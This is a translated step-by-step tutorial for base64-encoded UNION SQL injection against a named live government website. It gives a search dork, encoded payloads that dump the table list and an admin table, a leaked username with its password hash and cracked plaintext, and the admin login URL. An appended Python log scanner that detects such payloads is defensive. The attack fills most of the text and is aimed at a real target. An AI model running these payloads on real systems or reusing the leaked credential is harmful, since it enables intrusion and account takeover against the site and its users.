Sql Base64

Material by: Gilang
 

Live target: http://dwf72.go.th/


1. First, find the site's parameter to inject into


site:dwf72.go.th inurl:php?id=


2. For this base64 SQL injection you need an app or an online tool to encode and decode base64


https://play.google.com/store/apps/details?id=duy.com.text_converter


3. Choose a method, then click base64


Then enter the parameter number 184


The encoded value will come out as MTg0==


4. Add a ' after the number 184


So it becomes

184'


Then copy the encoded result


MTg0Jw==


Then paste it into the parameter like this


http://dwf72.go.th/news.php?id=MTg0Jw==


An error will then appear, meaning it is vulnerable


5. Do the order by step just as in ordinary SQL injection

But encoded as base64


184 order by 1 -- -


Then copy the encoded result into the parameter, and keep going until it errors


(order by 27) normal

http://dwf72.go.th/news.php?id=MTg0IG9yZGVyIGJ5IDI3IC0tIC0=


(order by 28) error

http://dwf72.go.th/news.php?id=MTg0IG9yZGVyIGJ5IDI4IC0tIC0=


This means we only use 1 - 27


6. We encode again:

-184 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -


Result:

LTE4NCB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcgLS0gLQ==


Then put it into the site's parameter again:


http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsMjYsMjcgLS0gLQ==


And the "lottery" numbers appear on the page


7. Move on to the dump stage


We encode again:

-184 union select 1,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -


Result:

LTE4NCB1bmlvbiBzZWxlY3QgMSwyLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


Then we put it into the parameter again:

http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


And the tables will appear


8. Next, scroll down and look for the table with username & password


9. Then we dump it, but don't forget to encode first


-184 union select 1,2,(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -


Result:

LTE4NCB1bmlvbiBzZWxlY3QgMSwyLChTRUxFQ1QoQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChTRUxFQ1QoQHgpRlJPTShhZG1pbilXSEVSRShAeClJTihAeDo9Q09OQ0FUKDB4MjAsQHgsdXNlcm5hbWUsMHgyMDNhM2EyMCxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


Link:


http://dwf72.go.th/news.php?id=LTE4NCB1bmlvbiBzZWxlY3QgMSwyLChTRUxFQ1QoQHgpRlJPTShTRUxFQ1QoQHg6PTB4MDApLChTRUxFQ1QoQHgpRlJPTShhZG1pbilXSEVSRShAeClJTihAeDo9Q09OQ0FUKDB4MjAsQHgsdXNlcm5hbWUsMHgyMDNhM2EyMCxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDQsNSw2LDcsOCw5LDEwLDExLDEyLDEzLDE0LDE1LDE2LDE3LDE4LDE5LDIwLDIxLDIyLDIzLDI0LDI1LDI2LDI3IC0tIC0=


And here the usernames and passwords will be visible


10. Then we take the top one


sirinthip :: d01e270f53588fa9dcecd95968fba56374fc85ab


For

user : sirinthip

password : hash first


We look up the hash

d01e270f53588fa9dcecd95968fba56374fc85ab


Here:

https://hashes.com/en/decrypt/hash


11. Then copy the result:

d01e270f53588fa9dcecd95968fba56374fc85ab:puypam


So


user : sirinthip

password : puypam


12. Then we look for the admin login page first


http://dwf72.go.th/login


This is the admin login page


13. And you just log in


Once that's done, the admin dashboard will be displayed
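
Added example, not part of the original tutorial: because the value of `id` travels base64-encoded in every step above, a filter or log search that looks at the raw query string sees only an opaque token. This Python sketch decodes base64 query parameters in access-log lines before checking them; the log format, the `203.0.113.5` address, the signature list and the sample lines are constructed assumptions.

```python
import base64, re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Small signature set applied to the *decoded* value (illustrative, not exhaustive).
SQLI = re.compile(r"'|--|\bunion\b.*\bselect\b|\border\s+by\b|information_schema", re.I)

def decode_b64(value):
    """Return the decoded text if value is strict base64 of UTF-8 text, else None."""
    value = value.replace(" ", "+")  # parse_qsl turns '+' into a space
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text or None

def inspect_request(target):
    """Classify every base64 query parameter of one request target."""
    results = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = decode_b64(value)
        if decoded is None:
            continue
        if re.fullmatch(r"[0-9]+", decoded):  # the only shape a numeric id may have
            verdict = "ok"
        elif SQLI.search(decoded):
            verdict = "sqli"
        else:
            verdict = "unexpected"
        results.append((name, decoded, verdict))
    return results

def scan(log_lines):
    """Return (line_no, param, decoded, verdict) for every non-ok parameter."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if m:
            hits += [(no, *r) for r in inspect_request(m.group(1)) if r[2] != "ok"]
    return hits

def _line(decoded_id):  # builds one constructed access-log line
    b64 = base64.b64encode(decoded_id.encode()).decode()
    return f'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id={b64} HTTP/1.1" 200 512'

SAMPLE_LOG = [_line("184"), _line("184'"), _line("184 order by 28 -- -"), _line("abc")]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

On the application side the same check is the fix: decode the parameter, accept only digits, and bind the value as a query parameter instead of concatenating it into the SQL string.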
